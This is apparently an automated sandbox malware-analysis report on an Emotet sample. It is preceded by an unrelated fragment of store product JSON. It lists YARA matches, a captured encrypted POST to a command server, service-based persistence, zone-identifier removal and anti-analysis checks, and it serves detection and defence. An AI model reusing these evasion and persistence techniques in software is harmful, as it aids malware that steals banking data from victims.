","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6

URLs found in memory or binary data

Source: svchost.exe, 0000000E.00000002.477891576.0000012F64B00000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.743701723.000001FADEA8A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000E.00000002.477596789.0000012F642E7000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.743601011.000001FADEA18000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.microsoft.co
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/r
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/e5f6356f-80b5-47df-960c-a214cf301822/55652
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 0000000E.00000003.459588748.0000012F65002000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Posts data to webserver

Source: unknown

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 77.157.40.119:443Content-Length: 388Connection: Keep-AliveCache-Control: no-cacheData Raw: 2e f5 8d 30 20 97 63 af c8 5c 78 1d 1b 05 84 50 56 8e 19 5b d4 5e 84 69 7f 59 6c 87 46 e0 d0 59 8a f6 f3 38 80 a7 31 36 2a 41 93 7c 48 14 e8 94 4c f9 4b a4 47 e8 3f dd ae dc 2e 2b a6 0b 4e 9c 34 a8 33 bf b2 99 f0 55 30 50 57 c9 c7 08 84 57 c2 87 fe ef f4 fc 77 58 f0 6b 96 ac 8a dc 86 e9 20 3d c9 74 db ea 0a ab 88 74 c8 a2 da fc ca 06 27 02 7e a7 63 dd 3c 82 37 62 c3 a8 6a 68 12 a6 6c 70 b1 91 2e 31 24 27 9d ec 9e b1 3c 60 67 ed 52 57 23 21 97 d1 43 4b 2b f3 c0 e1 d7 82 bd 52 05 c3 43 20 17 61 0a dc ab cd c6 64 a6 a4 fe c2 c1 49 a3 e5 b5 c1 14 51 03 79 f0 cd 9d 37 2c 80 ec 86 6d 01 ab 1d 6e 2b af 18 4a 34 7e 89 f2 2d df ca f3 76 fb 2a 58 a0 da 6e 5b b3 e4 35 ff 79 1c 08 46 4f f8 f4 d1 97 26 3f 57 f1 fe 15 cb 39 c2 3f 9a 59 61 23 4a 83 97 0b 58 bb b3 e5 2d a3 fb 9e bd 22 dc 9e 9e e9 b1 bf 77 80 43 48 4f 42 61 24 17 ab 8b 56 2a d4 4c c4 56 1c 00 70 44 c3 81 65 e6 f8 8f 76 25 88 52 c6 8c 6e 33 f3 e4 0e 60 c1 63 0e 7a 7b 6f 50 ab 44 30 93 04 9f e4 a9 3a 73 17 af 84 fb 97 c1 dd 90 81 87 1b d4 f8 ce e1 a3 09 5c f0 44 44 8f 9c 35 7c bc 2a c5 93 40 4e 97 a2 d9 5b ed bd de 1b 90 8c 2a 61 27 49 13 6f 1a d4 55 91 07 0b ff b1 62 6e ec f2 b1 b2 df 1a d2 2d c8 Data Ascii: .0 c\xPV[^iYlFY816*A|HLKG?.+N43U0PWWwXk =tt'~c<7bjhlp.1$'<`gRW#!CK+RC adIQy7,mn+J4~-v*Xn[5yFO&?W9?Ya#JX-"wCHOBa$V*LVpDev%Rn3`cz{oPD0:s\DD5|*@N[*a'IoUbn-

Contains functionality to download additional files from the internet

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD16D8 InternetReadFile,

5_2_00CD16D8

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: tcpmdmaus.exe, 00000000.00000002.372082476.000000000096A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2195 CryptImportKey,LocalFree,CryptReleaseContext,		5_2_00CD2195
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482195 CryptImportKey,LocalFree,CryptReleaseContext,		7_2_01482195

System Summary:

Malicious sample detected (through community Yara rule)

Source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly

Uses 32bit PE files

Source: tcpmdmaus.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload

Deletes files inside the Windows folder

Source: C:\Users\user\Desktop\tcpmdmaus.exe

File deleted: C:\Windows\SysWOW64\sharedconnect.exe:Zone.Identifier

Jump to behavior

Creates files inside the system directory

Source: C:\Windows\SysWOW64\sharedconnect.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache

Jump to behavior

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD1F76 CreateProcessAsUserW,

5_2_00CD1F76

Sample file is different than original file name gathered from version info

Source: tcpmdmaus.exe, 00000000.00000000.345083706.00000000003F3000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe
Source: tcpmdmaus.exe, 00000005.00000000.370086170.00000000003F3000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe
Source: tcpmdmaus.exe	Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe

Contains functionality to delete services

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD80BC _snwprintf,OpenServiceW,DeleteService,CloseServiceHandle,

5_2_00CD80BC

PE file contains an invalid data directory

Source: tcpmdmaus.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0xfffff000 address: 0x0

Sample is known by Antivirus

Source: tcpmdmaus.exe	Virustotal: Detection: 85%
Source: tcpmdmaus.exe	Metadefender: Detection: 16%
Source: tcpmdmaus.exe	ReversingLabs: Detection: 96%

PE file has an executable .text section and no other executable section

Source: tcpmdmaus.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\tcpmdmaus.exe 'C:\Users\user\Desktop\tcpmdmaus.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Process created: C:\Users\user\Desktop\tcpmdmaus.exe C:\Users\user\Desktop\tcpmdmaus.exe
Source: unknown	Process created: C:\Windows\SysWOW64\sharedconnect.exe C:\Windows\SysWOW64\sharedconnect.exe
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process created: C:\Windows\SysWOW64\sharedconnect.exe C:\Windows\SysWOW64\sharedconnect.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Process created: C:\Users\user\Desktop\tcpmdmaus.exe C:\Users\user\Desktop\tcpmdmaus.exe			Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process created: C:\Windows\SysWOW64\sharedconnect.exe C:\Windows\SysWOW64\sharedconnect.exe			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Classification label

Source: classification engine

Classification label: mal84.troj.evad.winEXE@11/4@0/9

Contains functionality to create services

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,		5_2_00CD8142
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,		7_2_01488142

Reads ini files

Source: C:\Users\user\Desktop\tcpmdmaus.exe

File read: C:\Users\desktop.ini

Jump to behavior

Contains functionality to modify services (start/stop/modify)

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD81DF ChangeServiceConfig2W,

5_2_00CD81DF

Contains functionality to enum processes or threads

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_00951B40 CreateToolhelp32Snapshot,

0_2_00951B40

Creates mutexes

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\MAF72BC4A
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Mutant created: \Sessions\1\BaseNamedObjects\PEMD70
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Mutant created: \Sessions\1\BaseNamedObjects\PEM14F8
Source: C:\Windows\SysWOW64\sharedconnect.exe	Mutant created: \BaseNamedObjects\Global\IAF72BC4A
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IAF72BC4A

Reads the hosts file

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: tcpmdmaus.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Source: tcpmdmaus.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:

Binary string: ewjrRWJW##@HRh.pdb source: tcpmdmaus.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 0_2_003D2E75 push ecx; ret		0_2_003D2E98
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_003D2E75 push ecx; ret		5_2_003D2E98
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 6_2_003D2E75 push ecx; ret		6_2_003D2E98
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_003D2E75 push ecx; ret		7_2_003D2E98

PE file contains sections with non-standard names

Source: tcpmdmaus.exe	Static PE information: section name: .bT
Source: tcpmdmaus.exe	Static PE information: section name: D
Source: tcpmdmaus.exe	Static PE information: section name: .crt0
Source: tcpmdmaus.exe	Static PE information: section name: cji8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_00951966 LoadLibraryA,GetProcAddress,

0_2_00951966

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\sharedconnect.exe

Executable created and started: C:\Windows\SysWOW64\sharedconnect.exe

Jump to behavior

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\tcpmdmaus.exe

PE file moved: C:\Windows\SysWOW64\sharedconnect.exe

Jump to behavior

Boot Survival:

Contains functionality to start windows services

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD81F7 StartServiceW,CloseServiceHandle,CloseServiceHandle,

5_2_00CD81F7

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\tcpmdmaus.exe

File opened: C:\Windows\SysWOW64\sharedconnect.exe:Zone.Identifier read attributes | delete

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\SysWOW64\sharedconnect.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\svchost.exe TID: 5704	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6920	Thread sleep time: -30000s >= -30000s			Jump to behavior

Contains functionality to enumerate running services

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,		5_2_00CD7F4D
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: EnumServicesStatusExW,GetLastError,		5_2_00CD7EF4
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,		7_2_01487F4D
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: EnumServicesStatusExW,GetLastError,		7_2_01487EF4

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries a list of all running processes

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Process information queried: ProcessInformation

Jump to behavior

Program exit points

Source: C:\Windows\SysWOW64\sharedconnect.exe

API call chain: ExitProcess graph end node

Checks the free space of harddrives

Source: C:\Users\user\Desktop\tcpmdmaus.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: svchost.exe, 00000013.00000002.743677693.000001FADEA62000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000000E.00000002.477596789.0000012F642E7000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.742209194.000001FAD922A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_00951966 LoadLibraryA,GetProcAddress,

0_2_00951966

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_009518C0 GetProcessHeap,RtlFreeHeap,

0_2_009518C0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 0_2_00952010 mov eax, dword ptr fs:[00000030h]		0_2_00952010
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 0_2_009515E0 mov eax, dword ptr fs:[00000030h]		0_2_009515E0
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2010 mov eax, dword ptr fs:[00000030h]		5_2_00CD2010
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD15E0 mov eax, dword ptr fs:[00000030h]		5_2_00CD15E0
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_014815E0 mov eax, dword ptr fs:[00000030h]		7_2_014815E0
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482010 mov eax, dword ptr fs:[00000030h]		7_2_01482010

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Windows\SysWOW64\sharedconnect.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Contains functionality to query windows version

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_0095261F RtlGetVersion,GetNativeSystemInfo,

0_2_0095261F

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY